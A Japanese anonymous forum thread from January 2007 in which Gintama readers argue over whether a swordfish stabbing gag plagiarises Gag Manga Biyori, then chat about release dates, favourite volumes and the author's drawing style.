157 :名無しさんの次レスにご期待下さい:2007/01/05(金) 23:57:45 ID:yV9v4AP0
>>155
その話読んでたけど、全く気づかなかったw

158 :名無しさんの次レスにご期待下さい:2007/01/06(土) 00:05:34 ID:fn7wCIhC
女がカジキくわえてたら完全アウトだったな
女がカジキくわえてた時点で笑っちゃったから俺的にはセーフだけど

159 :名無しさんの次レスにご期待下さい:2007/01/06(土) 00:06:50 ID:Fn/aN2gD
http://p.pita.st/?0bza6izj
最近ぴた調子悪いのかな?うpしたんだが携帯で開いてみても見えない……
パソコン組はどう?

160 :名無しさんの次レスにご期待下さい:2007/01/06(土) 00:14:51 ID:jaGewZfG
カジキマグロが刺さって重傷を負ったという事故は実在するぞ

161 :名無しさんの次レスにご期待下さい:2007/01/06(土) 00:31:53 ID:5YmtRB6H
2通り思った
@パクリならバレないように直して書くだろ 刺さる食い物なんて幾らでもあるのにカジキをそのまま使った意図が分からん そんな時間なかったのか?あ、でも木を隠すには(ry
Aパクリじゃないにしては変なギャルゲ&カジキと回は違うにせよ同じ漫画で2つも被ったのはかなり怪しい 絶対最近日和読んで影響されて書いただろ それともやっぱギャグ漫画家は思考似てるのか?

>>160
mjd?

162 :名無しさんの次レスにご期待下さい:2007/01/06(土) 00:33:13 ID:cAgw29Ou
世界丸見えでカジキ釣りしてて、船に飛び込んできたカジキに
女の人が胸を刺されたっていうのを見たことあるよ。
女の人は豊胸手術をしてたんで上げ底用のパックがクッションに
なって致命傷にならなかったとかそんなん。

163 :名無しさんの次レスにご期待下さい:2007/01/06(土) 00:42:01 ID:D8xHUkvb
二人ともその番組見たんじゃねーの?

164 :名無しさんの次レスにご期待下さい:2007/01/06(土) 00:42:20 ID:jaGewZfG
>>162
自分が見たのは足刺されてた映像だった

165 :名無しさんの次レスにご期待下さい:2007/01/06(土) 00:42:33 ID:fn7wCIhC
それはどうでもいい。

166 :名無しさんの次レスにご期待下さい:2007/01/06(土) 00:49:53 ID:fn7wCIhC
>>163
それはないでしょ 時期が違うし
俺は楽しめたからいいけど

167 :名無しさんの次レスにご期待下さい:2007/01/06(土) 01:16:20 ID:/loIUqex
単純に刺しやすくて描きやすい物体が
カジキだったんじゃないかと思うんだが
サイとか象の牙とかめんどそうだし

168 :名無しさんの次レスにご期待下さい:2007/01/06(土) 01:17:10 ID:fn7wCIhC
いや、カジキは怪しいよ。

169 :名無しさんの次レスにご期待下さい:2007/01/06(土) 01:17:31 ID:cAgw29Ou
>>164
そういわれると足だったかもしれない。
でも胸のパックに穴が空いたのもあった気がするんだが別のネタと
記憶がごっちゃになってるかもしんない。

170 :名無しさんの次レスにご期待下さい:2007/01/06(土) 01:20:08 ID:W2k4KcQM
モンスターハンターってゲームのパロかと思ってた
確かカジキマグロの武器みたいのががあったよね?
有名なゲームだと思うんだけど。

171 :名無しさんの次レスにご期待下さい:2007/01/06(土) 01:21:27 ID:jaGewZfG
>>169
カジキマグロで足貫通の映像は何回か見たことあるが(同じ映像)
胸貫通は見たことないなぁ

172 :名無しさんの次レスにご期待下さい:2007/01/06(土) 01:23:21 ID:cAgw29Ou
>>171
じゃあ別のエピソードとごっちゃになって覚えてたんだな。なんかスマン。

173 :名無しさんの次レスにご期待下さい:2007/01/06(土) 01:24:23 ID:cAgw29Ou
>>167
刺しやすい生き物ならイッカクがお勧め

174 :名無しさんの次レスにご期待下さい:2007/01/06(土) 01:28:21 ID:jaGewZfG
イッカクは食えん

175 :名無しさんの次レスにご期待下さい:2007/01/06(土) 01:29:50 ID:l0EUHA/5
銀魂が好きなら黙って空知を
信じればイイじゃん
正直パクリ疑惑とか飽きた

176 :名無しさんの次レスにご期待下さい:2007/01/06(土) 01:29:53 ID:hYiGoUZ5
男ならカジキ!

177 :名無しさんの次レスにご期待下さい:2007/01/06(土) 01:35:49 ID:cAgw29Ou
>>174
刺しやすさに気を取られて食べやすさを忘れていた…orz

178 :名無しさんの次レスにご期待下さい:2007/01/06(土) 01:36:21 ID:jaGewZfG
>>176
それ何の話のサブタイだったっけ?

179 :名無しさんの次レスにご期待下さい:2007/01/06(土) 01:37:15 ID:cAgw29Ou
>>178
海老名さんが出てきたときのサブタイ

180 :名無しさんの次レスにご期待下さい:2007/01/06(土) 01:40:47 ID:lfga0hxo
カジキの話ばっかりw再来週までネタが無いからな〜

181 :名無しさんの次レスにご期待下さい:2007/01/06(土) 01:42:23 ID:fn7wCIhC
確かに思いつかなくもないネタだな
でも怪しいだろ

182 :名無しさんの次レスにご期待下さい:2007/01/06(土) 01:42:50 ID:hYiGoUZ5
いや別に

183 :名無しさんの次レスにご期待下さい:2007/01/06(土) 01:45:02 ID:sdQ3dMXj
カジキ?怪しいか?
てかびっくりさせんなよ

184 :名無しさんの次レスにご期待下さい:2007/01/06(土) 01:48:19 ID:jaGewZfG
>>179
そうだそうだ
サンクス

カジキマグロで攻撃と言えばスーファミのドンキーコングを真っ先に思い出す

185 :名無しさんの次レスにご期待下さい:2007/01/06(土) 02:01:56 ID:fn7wCIhC
まぁ147がニヤニヤ?してたから心配だったが意外と大した事なかったな

186 :名無しさんの次レスにご期待下さい:2007/01/06(土) 02:28:32 ID:IRcfE1Dg
カジキマグロ胸貫通みたよノシ
同じく豊胸のおかげで間一髪助かったというもの。

同じ番組をみたのでは?→時期が違うってのは見当違いだぞ。
何年か前にテレビで見たっきりの情報をふと思い出してネタにするなんてよくあることだ。

カジキ以外で刺せて持ち運べる生き物ってあるか?
サイとかはさすがに無理だし。

187 :名無しさんの次レスにご期待下さい:2007/01/06(土) 02:39:00 ID:1MfDXGlc
同じく。その豊胸の見た。

188 :名無しさんの次レスにご期待下さい:2007/01/06(土) 02:39:40 ID:lfga0hxo
腹を男の人がカジキに刺されたって映像は見たことある。
あと、ダツって魚も危険らしいよ。って何のスレ?ここはww
 


189 :名無しさんの次レスにご期待下さい:2007/01/06(土) 02:44:21 ID:SaRRUh2l
カジキマグロ…。
戦国バサラの隠し武器にもあったなw

190 :名無しさんの次レスにご期待下さい:2007/01/06(土) 02:50:54 ID:lfga0hxo
意外とよくある武器なんだなw再来週まで暇だな

191 :名無しさんの次レスにご期待下さい:2007/01/06(土) 03:37:40 ID:MFXyhfnD
カジキマグロはゲームをパロッたのかと思った
日和じゃあからさま過ぎて逆に怪しくないし同じジャンプだから有り得ない

192 :名無しさんの次レスにご期待下さい:2007/01/06(土) 03:39:40 ID:M9Th3F2U
>184 エンガードナツカシスw

>188
ダツって光に向かって突っ込んでくるんだよな、船に突き刺さる事もあるらしいからダツの生息範囲の海での夜釣りには注意

残りのゲームが楽しみだ

193 :名無しさんの次レスにご期待下さい:2007/01/06(土) 04:03:11 ID:8KIbpyaN
銀魂のDSゲームにも冷凍マグロを投げつける攻撃があるしな

194 :名無しさんの次レスにご期待下さい:2007/01/06(土) 08:01:36 ID:IhcORklq
いまテレビでマグロブームじゃん空知すごいな
カジキだけど

195 :名無しさんの次レスにご期待下さい:2007/01/06(土) 08:09:35 ID:51dRWYeF
なんか忘れられてそうなんだが、あのシーンでカジキマグロを使う必要なんか全く無いわけで、
あそこはナイフでも何でも問題無いのに敢えて女にカジキくわえさせて、それを刺す為の武器に使ったのは
パクリと言わざるを得ないような……
『カジキマグロは武器として有り得る』じゃなくてあのシチュエーションで
カジキマグロくわえた奴を出して、それを凶器にまで利用させたってのが問題だよ

196 :名無しさんの次レスにご期待下さい:2007/01/06(土) 08:30:03 ID:vwi50I9g
ゲームネタだからゲームの武器から発想しても不自然じゃないと考えてもいいと思うけど。

日めくりカレンダーのバブルス皇女と目が合った。新年からバナナ入刀かよw
なんかもうどうでもよくなった。次のバレまで長いんだよな


197 :名無しさんの次レスにご期待下さい:2007/01/06(土) 08:38:49 ID:jaGewZfG
>>195
ナイフは食えない
あのシーンはベタにパンをくわえているってシチュエーションをもじったものだから
くわえているのは食物じゃないといけない
食物で凶器となりうる鋭さを持ったものという発想をして、
ゲームの武器などによく使われるカジキマグロが出てきたんだろう

198 :名無しさんの次レスにご期待下さい:2007/01/06(土) 08:54:26 ID:vbABG1ig
ナイフとか身近な刃物なら頭と心が弱い小中学生がマネするかもしんないだろー
だからマネできない凶器を考えたのさー




って思ったけどお妙さんや神楽は素手でボコッてるし、銀さんは木刀振り回してるし
真選組に至ってはバズーカとか真剣振り回してるし、ヅラは爆弾テロリストだし
近藤さんは脱糞ワントラップだし、そこまで考えてはなさそうだよな空知。

199 :名無しさんの次レスにご期待下さい:2007/01/06(土) 09:01:09 ID:xDXMZEbL
>>197
はぁ?
別にパンくわえてて、立ち去ろうとした時に
ナイフで刺せばいいだろ。
なんでくわえたモノで刺す必要があるんだwww

200 :名無しさんの次レスにご期待下さい:2007/01/06(土) 09:07:46 ID:VhH3ObGW
ちょっと今回は擁護苦しいな

201 :名無しさんの次レスにご期待下さい:2007/01/06(土) 09:13:24 ID:nC9CulUR
だな。
つか個人的に今回のシリーズつまらんので
それが何よりきつい

202 :名無しさんの次レスにご期待下さい:2007/01/06(土) 09:15:35 ID:ohkRhh+B
荒野をさすらうガンマンで本業は魚屋って人の武器がカジキマグロだったな
スゲー昔の少女マンガで

203 :名無しさんの次レスにご期待下さい:2007/01/06(土) 09:24:34 ID:FD+Oh2iy
便所紙レベルならいざ知らず…
パクリだからって騒ぐほどの話かね
ありがちネタだし別に大きなネタでも話の主軸でもないじゃん

204 :名無しさんの次レスにご期待下さい:2007/01/06(土) 09:31:32 ID:vbABG1ig
前田利家第6武器のカジキマグロってどんなんだ?

205 :名無しさんの次レスにご期待下さい:2007/01/06(土) 09:37:27 ID:pzsuwn/r
スルーしてもいいと思うよ。


206 :名無しさんの次レスにご期待下さい:2007/01/06(土) 10:13:59 ID:DfbikILc
とりあえずパクリパクリ言いたいようにしか見えない
荒れるからアンチスレ逝ってくれればいいのに

207 :名無しさんの次レスにご期待下さい:2007/01/06(土) 10:18:09 ID:fUJA7MXM
>>155読んだけど別に…とオモタ自分ずれてるのか?
銀魂のほうは、オチ的に安全だと思われた方の選択肢を選んだのに刺されてエンドっていうアイディアが先にあって、
そのために近藤さんの予想したくわえてる物がパン→カジキってだけじゃね?バターナイフより笑えたと思うし。
ギャグ漫画日和読んでないから知らんけど、>>155読む限りでは
確かにかぶってる部分あるから影響受けてるかもだけど笑いの狙いは違うような気がするし。

208 :名無しさんの次レスにご期待下さい:2007/01/06(土) 10:28:35 ID:fn7wCIhC
>>199
それはね、ナイフは元々切ったり刺す物なのでギャグにならないからだよ
もしくわえてるのが何の変哲もないパンで更に刺すのがナイフだとギャグ要素何もない それじゃ只のサスペンス
せめてカジキじゃなくてゴボウにでもしときゃよかったのにな

209 :名無しさんの次レスにご期待下さい:2007/01/06(土) 10:29:27 ID:Fu9jjfDi
アンチ厨は住み分けすらできないんだね

210 :名無しさんの次レスにご期待下さい:2007/01/06(土) 10:39:12 ID:fn7wCIhC
>>209
別に次のバレまで暇だから良くね?
彼らは毎週信者の前で批判できなくて悔しい思いしてるんだしたまには許してやれ

211 :名無しさんの次レスにご期待下さい:2007/01/06(土) 10:42:01 ID:fn7wCIhC
>>209
つか住み分けできてないお前が言うな


560:名無しさんの次レスにご期待下さい :2007/01/06(土) 10:23:08 ID:Fu9jjfDi [sage]
>>556
>>551ミロ

最近の厨は自己中ですね。

212 :名無しさんの次レスにご期待下さい:2007/01/06(土) 10:58:24 ID:51dRWYeF
>>208
立ち去ろうとしたときにナイフで刺せば普通にギャグになるだろ…
角でパンくわえた女とぶつかるっていう王道やってんだし

>>209-210
ここはアンチもOKだろ

213 :名無しさんの次レスにご期待下さい:2007/01/06(土) 11:09:48 ID:1MfDXGlc
だからナイフはただのグロだろ。
それではギャグも何もないだろ。
ギャグの王道と一般的な行動が区別できないんだな。

214 :名無しさんの次レスにご期待下さい:2007/01/06(土) 11:10:08 ID:fn7wCIhC
>>212
なんねーよ ギャグにしては微妙杉

ちなみに本当はアンチNGです

1:名無しさんの次レスにご期待下さい :2006/12/30(土) 21:27:12 ID:GdZ9sYIE [sage]
【空知英秋】銀魂 ネタバレスレッドPart71

・このスレのルール・~

†sage進行推奨
†アンチはアンチスレで←←←←←←←

215 :名無しさんの次レスにご期待下さい:2007/01/06(土) 11:20:57 ID:fn7wCIhC
つか>>212
パンくわえた女かと思いきや変な女っていうのが今回の空知のネタなわけであって、パンじゃ意味ないんだよ
何か刺さりそうな食い物じゃないと

216 :名無しさんの次レスにご期待下さい:2007/01/06(土) 12:40:24 ID:jaGewZfG
ゴボウだったらガキ使のパクリとか言われてた気がする

217 :名無しさんの次レスにご期待下さい:2007/01/06(土) 12:45:22 ID:L+iSniuG
ゴボウで人は殺せねぇよwww

218 :名無しさんの次レスにご期待下さい:2007/01/06(土) 12:52:23 ID:sdQ3dMXj
鞭として使うぐらいならできるかも

219 :名無しさんの次レスにご期待下さい:2007/01/06(土) 13:03:27 ID:A30UA0BJ
つららのように凍らせればあるいは…細いから無理

220 :名無しさんの次レスにご期待下さい:2007/01/06(土) 13:04:40 ID:NEyKMliY
アニメのせいでパクリがあってもパクリすらパロに見えてくる困った

221 :名無しさんの次レスにご期待下さい:2007/01/06(土) 13:07:07 ID:fn7wCIhC
>>216
ガキ使であった?

222 :名無しさんの次レスにご期待下さい:2007/01/06(土) 13:30:58 ID:fh37icrx
銀さんVSモリマン

223 :名無しさんの次レスにご期待下さい:2007/01/06(土) 13:44:58 ID:VstF6lyk
お笑い漫画はこうでなくっちゃね!

224 :名無しさんの次レスにご期待下さい:2007/01/06(土) 13:50:15 ID:eHsGMCar
銀さんが布団で寝てたらを呼ぶ松陽「ショウヨウヨウ〜!」という声ががどこからか流れてくる。
笑ったら神楽と新八がゴボウでケツをしばきにくるというのは見てみたい。

225 :名無しさんの次レスにご期待下さい:2007/01/06(土) 13:56:13 ID:9/Bjwb3S
>>224
それはさすがにw笑ってはいけないの奴じゃねーかw

226 :名無しさんの次レスにご期待下さい:2007/01/06(土) 14:18:40 ID:jaGewZfG
ショウヨウヨウワロス

227 :名無しさんの次レスにご期待下さい:2007/01/06(土) 14:28:21 ID:sOqkM+P/
ショウヨウヨ〜ウ!!!

銀時「・・・プッ!」
高杉「銀時、アウト」

デデ〜ン!! バシ!!

銀時「痛っっ!!それきたないわぁ〜」

228 :名無しさんの次レスにご期待下さい:2007/01/06(土) 14:39:12 ID:9XCIF8hc
なんでもかんでもパクリ扱い
銀魂スレは池沼の巣窟か

229 :名無しさんの次レスにご期待下さい:2007/01/06(土) 15:06:50 ID:fn7wCIhC
いつからここはガキ使スレに(ry
ところで先週の神楽や花野アナ見て思ったんだがくりんちゃんの影響(?)で目が縦に長くなったな

230 :名無しさんの次レスにご期待下さい:2007/01/06(土) 16:34:53 ID:LDY9scOW
俺もどちらかといえば銀魂信者に当てはまるけど
ギャグ漫画である『ギャグ漫画日和』がギャグのネタとして
『カジキマグロをくわえた猫』とそれが刺さるネタをやってしまっている以上、
どんなに言い訳してもそれは盗作と言われても仕方ないような・・・。

231 :名無しさんの次レスにご期待下さい:2007/01/06(土) 16:43:24 ID:fn7wCIhC
まぁ後出しはどうしても不利だしな
まして2つも被ったら本当にパクってなかったとしても誰も信じてくれないよ

232 :名無しさんの次レスにご期待下さい:2007/01/06(土) 16:43:30 ID:jaGewZfG
なんかもう銀魂のほうはマグロ女という際どいネタをやりたかっただけじゃないかという気がしてきた

233 :名無しさんの次レスにご期待下さい:2007/01/06(土) 16:45:02 ID:hYiGoUZ5
正直パクリパクリ言ってたら何も楽しめないですよ

234 :名無しさんの次レスにご期待下さい:2007/01/06(土) 16:46:23 ID:hYiGoUZ5
>>231
http://kuroneko-y.hp.infoseek.co.jp/kajogaki.html


235 :名無しさんの次レスにご期待下さい:2007/01/06(土) 16:48:10 ID:9XCIF8hc
ホント基地外だらけのスレになったな

236 :名無しさんの次レスにご期待下さい:2007/01/06(土) 16:52:29 ID:fn7wCIhC
>>234
そうそう、それもあるしね

237 :名無しさんの次レスにご期待下さい:2007/01/06(土) 16:57:12 ID:OCnYjFDZ
いい加減スルーしませう。

238 :名無しさんの次レスにご期待下さい:2007/01/06(土) 16:57:12 ID:MFXyhfnD
ヒロインがマグ子でエンディングがマグロ漁船なんだからマグロで刺すのは自然な流れだろ
だいたいパクるならタイミング悪杉てありえん


マグロより再来週のゲーム予想はないのか

239 :名無しさんの次レスにご期待下さい:2007/01/06(土) 16:58:26 ID:GMJlUKfg
「カジキマグロ」がいろんなゲームで武器になってたり、実際に刺さるという事例が報告されていて、それが(テレビで取り上げられたりして)
ある程度世間一般の人が危険な生き物(刺さる)という認識があるっぽいから、セーフじゃね?
日和の方が先だっただけで、別にカジキマグロが特別なギャグのネタという訳じゃない。
ギャグの特許なんてあるわけないんだから、もちろんやっていい訳だ。

ってか>>234で解決してないか?ちょっと盗作というには辛すぎると思う。

240 :名無しさんの次レスにご期待下さい:2007/01/06(土) 16:58:52 ID:LDY9scOW
>>234

『カジキマグロくわえたネコ』と車と女がぶつかって、カジキマグロが人物に刺さる

『カジキマグロくわえた女』と男がぶつかって立ち去ろうとした男がカジキマグロで刺されて死亡

似通ってる部分が具体的過ぎる。
箇条書きマジックはあまりにも抽象的なんだよ。
それを引っ張り出して反論しても無駄だと思うよ。
信者、本人は盗作じゃないと思っても一般的には盗作と思わざるを得ない

241 :名無しさんの次レスにご期待下さい:2007/01/06(土) 17:02:12 ID:jaGewZfG
お魚くわえたドラ猫と
パンをくわえた女子高生と道でぶつかる
どっちもベッタベタなネタですが

242 :名無しさんの次レスにご期待下さい:2007/01/06(土) 17:04:23 ID:LDY9scOW
>>241
そのベタな展開にカジキマグロをもってきたのがまずい

243 :名無しさんの次レスにご期待下さい:2007/01/06(土) 17:06:30 ID:jaGewZfG
逆に言うと被ったのはカジキマグロの一点のみ

244 :名無しさんの次レスにご期待下さい:2007/01/06(土) 17:07:34 ID:oi2OgLsR
カジキマグロとか言われても昨日か一昨日の夕方のニュースの特集で60代のおじちゃんが一生懸命カジキ獲ろうとしてたのしかうかばなかった
最後近所のオッさんが大物とっちゃって60代のおじちゃんが孫の運動会の最中に遠い目になってたのが目に焼き付いて離れない

245 :名無しさんの次レスにご期待下さい:2007/01/06(土) 17:15:46 ID:hYiGoUZ5
>>240
もっと具体的にしてみろや

246 :名無しさんの次レスにご期待下さい:2007/01/06(土) 17:21:10 ID:2oes0nVP
いい加減スルーしねえ?
平行線に決まってんじゃん

247 :名無しさんの次レスにご期待下さい:2007/01/06(土) 17:26:24 ID:r8Cd4Wjy
スルーしていいんだぜ?

次回の対決の組み合わせとゲームの方が気になる


248 :名無しさんの次レスにご期待下さい:2007/01/06(土) 17:28:24 ID:9XCIF8hc
このスレは本当にレベルが低いな
>>240みたいなこと言ってると
ほとんどの漫画がパクリ漫画だろうが

249 :名無しさんの次レスにご期待下さい:2007/01/06(土) 17:29:01 ID:sdQ3dMXj
次にバレが来るのって今週の木曜?
ゲームはちょっと前に出てたけどホラーアクションゲーが見たいw

250 :名無しさんの次レスにご期待下さい:2007/01/06(土) 17:30:10 ID:TT1SOjtR
ゲームは007みたいな3Dアクションのタッグマッチ

251 :名無しさんの次レスにご期待下さい:2007/01/06(土) 17:34:19 ID:r8Cd4Wjy
次のバレは18日辺りと思う。

252 :名無しさんの次レスにご期待下さい:2007/01/06(土) 17:37:46 ID:fn7wCIhC
>>240
箇条書き失敗して似てる感じが出てない 共通部分だけを抜き出さなきゃ
・角でぶつかる
・登場人物が干渉した相手はカジキマグロをくわえているという異様な状況
・登場人物はカジキマグロが刺さって死んだ

253 :名無しさんの次レスにご期待下さい:2007/01/06(土) 17:40:44 ID:fn7wCIhC
>>248
そう思うならageるな

254 :名無しさんの次レスにご期待下さい:2007/01/06(土) 17:45:28 ID:hYiGoUZ5
>>252
箇条書きマジックになってるな・・・

255 :名無しさんの次レスにご期待下さい:2007/01/06(土) 17:47:50 ID:iyrIqVz0
見事な箇条書きマジックだw勉強になったよ。

バレまで凄く間があるな・・・

256 :名無しさんの次レスにご期待下さい:2007/01/06(土) 19:01:57 ID:ChQ/WQvY
18日・・どんだけ先なんだ

次の17巻は3月発売か
これもだいぶ先だ

257 :名無しさんの次レスにご期待下さい:2007/01/06(土) 19:18:10 ID:3YlI6P8v
え、18日までバレないのか…

258 :名無しさんの次レスにご期待下さい:2007/01/06(土) 19:30:35 ID:3cEKWyw9
次は22日発売だっけ?
16巻も1月4日発売組みより一週間早かっただけで、実質的には2ヵ月毎にコミックスだしてるんだよな。
刊行ペースが早いのは嬉しい

259 :名無しさんの次レスにご期待下さい:2007/01/06(土) 21:33:26 ID:NEyKMliY
やっぱさぁ万事屋でGとか鍋とか雪祭りとかペドロとかみたくさぁ
コメディやってるのがいいよねと思った


260 :名無しさんの次レスにご期待下さい:2007/01/06(土) 22:08:01 ID:8pMBVpXJ
ああうん思ってた

自分はグラさんんんんの回が好きだ
新鮮味があって

261 :名無しさんの次レスにご期待下さい:2007/01/06(土) 22:35:56 ID:MFXyhfnD
紅桜みたいなシリアスなら歓迎
意外性多くて面白かったし過去にも触れてて良かった
あとはコメディがいいな

262 :名無しさんの次レスにご期待下さい:2007/01/06(土) 22:49:21 ID:8K5ID+2X
過去絡めたシリアスなら見たいな
紅桜は戦闘が良かった

263 :名無しさんの次レスにご期待下さい:2007/01/06(土) 23:28:31 ID:fn7wCIhC
>>258
その分空知が死にそう

264 :名無しさんの次レスにご期待下さい:2007/01/07(日) 00:26:20 ID:rsVa9P/y
過去話はなんか切ないからいけねェや
志村姉弟でも銀さん達でも神楽でも・・・

265 :名無しさんの次レスにご期待下さい:2007/01/07(日) 00:33:40 ID:35HMXSz2
過去話が出てきてないのってハタ皇子ととっつぁんと武蔵似の人と誰?

266 :名無しさんの次レスにご期待下さい:2007/01/07(日) 00:44:44 ID:fV6Id3Gm
>>265
武蔵の過去に触れたら立ち直れなくなりそうだから勘弁です
エリザベスの過去は気になる

豚切けど銀魂で一番良かった巻ってどれだと思う?

267 :名無しさんの次レスにご期待下さい:2007/01/07(日) 00:47:08 ID:bn3yb05T
断然12巻
ギャグ・シリアスのバランスが良いしネタも最高

268 :名無しさんの次レスにご期待下さい:2007/01/07(日) 00:47:59 ID:ImC5NIHR
どの巻も突出していいというのはないかなー
どれも面白のもつまんないのも入ってる印象

269 :名無しさんの次レスにご期待下さい:2007/01/07(日) 00:50:59 ID:Btpfeq7Z
3巻 初期の傑作が詰まってると思う、12巻 いろいろ濃い  この巻が並んで好きだな
 

270 :名無しさんの次レスにご期待下さい:2007/01/07(日) 01:05:50 ID:4tUe18qS
あのー、画バレって今週ないんですか・・
自分が見逃してるだけか・・

271 :名無しさんの次レスにご期待下さい:2007/01/07(日) 01:08:47 ID:NMvtMav/
ヒント:合併号

272 :名無しさんの次レスにご期待下さい:2007/01/07(日) 01:15:09 ID:4tUe18qS
合併号・・このまえの「wii」ネタが合併号だったんじゃ?

273 :名無しさんの次レスにご期待下さい:2007/01/07(日) 01:16:49 ID:FsD81Cp2
>>270
今日がジャンプの発売日

274 :名無しさんの次レスにご期待下さい:2007/01/07(日) 01:17:18 ID:fBB14jsC
その次もまた合併号だよ
6、7号は昨日発売
8号は22日発売

275 :名無しさんの次レスにご期待下さい:2007/01/07(日) 01:27:03 ID:oUpHF7EC
22日って…センター終わってんじゃん

276 :名無しさんの次レスにご期待下さい:2007/01/07(日) 01:29:00 ID:4tUe18qS
よくわかりませんが、最後に質問
>6、7号は昨日発売
このネタバレはもう上がったてことでしょうか。

277 :名無しさんの次レスにご期待下さい:2007/01/07(日) 01:31:12 ID:FsD81Cp2
>>276
YES。1週間前にきてた。

278 :名無しさんの次レスにご期待下さい:2007/01/07(日) 01:32:08 ID:fBB14jsC
6、7号のネタバレは年末に上がってる

279 :名無しさんの次レスにご期待下さい:2007/01/07(日) 01:42:43 ID:aVUv95xK
自分は5巻がなかなか良かった
色んなタイプの話だったし・・

初期の頃の絵好きなんだよなー
背景も空知だと何故か安心するんだよ

280 :名無しさんの次レスにご期待下さい:2007/01/07(日) 02:05:21 ID:VGOggqkr
>>279
>背景も空知だと何故か安心するんだよ

分かる分かる
例え多少パースが狂っていても安心する
銀魂アシ絵が浮きすぎなんだよな
今週のギャルゲーの絵とか浮き過ぎてて気持ち悪くなった

281 :名無しさんの次レスにご期待下さい:2007/01/07(日) 02:57:10 ID:4tUe18qS
第百四十八訓「休みだからってゲームばっかやっちゃダメ」
↑この画バレってまだ残ってる?

282 :281:2007/01/07(日) 03:02:51 ID:4tUe18qS
探したらありました。どうも!

283 :名無しさんの次レスにご期待下さい:2007/01/07(日) 09:12:15 ID:FmHSd/MA
>>280
わかるわかる
銀魂はほかの漫画よりアシの絵が浮いてるから、どれが空知の絵か一発でわかる
アシの線がかすれた感じになってるのが気になる

284 :名無しさんの次レスにご期待下さい:2007/01/07(日) 10:06:16 ID:2bAHtl1o
空知とアシスタントの絵ってかなり違うからすぐわかるな・・
背景は別として人物の差がありすぎて違和感はある

でもまあ、どの漫画もそうだろうけど

285 :名無しさんの次レスにご期待下さい:2007/01/07(日) 10:08:15 ID:QqjgI8AQ
普通に絵が上手い人が空知の絵のタッチ真似すんの無理だと思う。
他人に真似できないもん持ってると強いよな。

286 :名無しさんの次レスにご期待下さい:2007/01/07(日) 11:17:39 ID:qO/dV6gy
明日のジャンプって
土曜発売なんですか?

287 :名無しさんの次レスにご期待下さい:2007/01/07(日) 12:08:05 ID:ydBNcToc
>>286 先週の土曜に出たよ。もう普通に売ってる

空知の絵はやたら目がでかかったりするマンガっぽい絵じゃないから読みやすい。
あと表情の描き方が丁寧
不満と言えば手や人体の形が少々不安定なこと。筋肉・関節のかき方があまり上手くない

288 :名無しさんの次レスにご期待下さい:2007/01/07(日) 12:16:12 ID:IBj5w9JP
少女漫画みたいに可愛らしくしてないのに愛嬌があるキャラばっかりだよな

そういえばアシスタントの中で異常に目立つ絵を書く奴がいるけど
あれ誰だ?
特にドリィムキャッツァァァのときの信者の絵

289 :名無しさんの次レスにご期待下さい:2007/01/07(日) 13:49:43 ID:xlMJrKW8
なんで沖田土方に死ねって言わなくなったんだ

290 :名無しさんの次レスにご期待下さい:2007/01/07(日) 14:14:12 ID:KGt/1i1k
>>289

638: 2007/01/07 13:42:15 hIYh1WbXO [sage]

沖肘沖もう沖田の土方抹殺ギャグやらなくなっちゃうのかな
あれ好きだったんだけどな




291 :名無しさんの次レスにご期待下さい:2007/01/07(日) 14:15:33 ID:FsD81Cp2
昔みたいに背景も空知が描けよ〜

292 :名無しさんの次レスにご期待下さい:2007/01/07(日) 15:18:04 ID:rsVa9P/y
>>289
あんな事あってもまだ氏ね氏ね言ってたら沖田ちょっとアレだぞ!!!w

293 :名無しさんの次レスにご期待下さい:2007/01/07(日) 15:32:07 ID:0Nniv9gW
気にくわない野郎でいいって言ってたから
基本的なスタンスは変わってないんじゃね?

空知の絵は最初に見たとき江口寿史に似てるなと思った
特に神楽。
江口好きだったから読む気になったというのもあるなー

294 :名無しさんの次レスにご期待下さい:2007/01/07(日) 15:41:51 ID:6ZviNTEd
初期の頃は髪の毛の線が多かったよな
神楽とか沖田とか・・

今でも登場人物紹介のページ
初期の頃の神楽の絵だから違和感あるな・・

295 :名無しさんの次レスにご期待下さい:2007/01/07(日) 16:15:09 ID:U/1IBEAY
あのさあ、丸出しだから帰れよ沖田厨の腐

296 :名無しさんの次レスにご期待下さい:2007/01/07(日) 16:18:35 ID:VGOggqkr
空知はこれでも絵の変化のあまりない漫画家だと思う
変化激しい漫画家だと1巻と最新刊のキャラが同一人物と分からなかったりする
まあ銀さん辺り大分変わったかな

297 :名無しさんの次レスにご期待下さい:2007/01/07(日) 16:21:25 ID:6l/ciXqY
絵から温かみが消えた

298 :名無しさんの次レスにご期待下さい:2007/01/07(日) 16:23:58 ID:F6bwTZts
銀さんは変わったよなー。すごい大人っぽくなった。

下ネタも深くなった。

299 :名無しさんの次レスにご期待下さい:2007/01/07(日) 16:25:40 ID:KGt/1i1k
>>296
ヒカルの碁の緒方とか整形したのかってぐらい違うしな

ただ初期はみんな丸っこくて顔が幼かったな
しかし神楽だけは逆に最近顔が幼くなった

300 :名無しさんの次レスにご期待下さい:2007/01/07(日) 16:27:03 ID:S5MqsC7F
下はアレな方向に深くなってほしくないがw
アイツを思い出すから

何とかリーダー伝とかいうのを描いてた、一時期逮捕されてた奴を

301 :名無しさんの次レスにご期待下さい:2007/01/07(日) 16:36:29 ID:0Nniv9gW
銀時は途中結構面長になって大人っぽくなってたが
最近また丸顔に戻ってきてね?
絵の温かみというのはよくわからんw

302 :名無しさんの次レスにご期待下さい:2007/01/07(日) 16:48:35 ID:6l/ciXqY
>>299
神楽は何か体だけどんどん成長してるよなw

303 :名無しさんの次レスにご期待下さい:2007/01/07(日) 17:26:06 ID:toace9t7
>>295
過剰反応乙

空知って絵が下手なんじゃなくて、いい加減なところが多すぎるだけだと思うなあ
しっかり書いてる所は上手いし…まぁ同じジャンプに小畑みたいな神がいるから比べちゃうとアレだが

304 :名無しさんの次レスにご期待下さい:2007/01/07(日) 17:41:35 ID:VGOggqkr
今週またいつものへタレたペン入れに戻ってた
芙蓉編からペン入れ上手くなってたのに
時間なかったんかな

305 :名無しさんの次レスにご期待下さい:2007/01/07(日) 17:47:42 ID:6ZviNTEd
確かにホワイトとかで修正した後に上から描くの忘れてるのか
途切れてる線とかあるよな
まあ銀魂らしくて好きだが

銀さんはだんだん目とか鋭い感じになってきたな・・



306 :名無しさんの次レスにご期待下さい:2007/01/07(日) 17:49:07 ID:6l/ciXqY
近藤が最近不気味

307 :名無しさんの次レスにご期待下さい:2007/01/07(日) 18:00:12 ID:DCh7ovZU
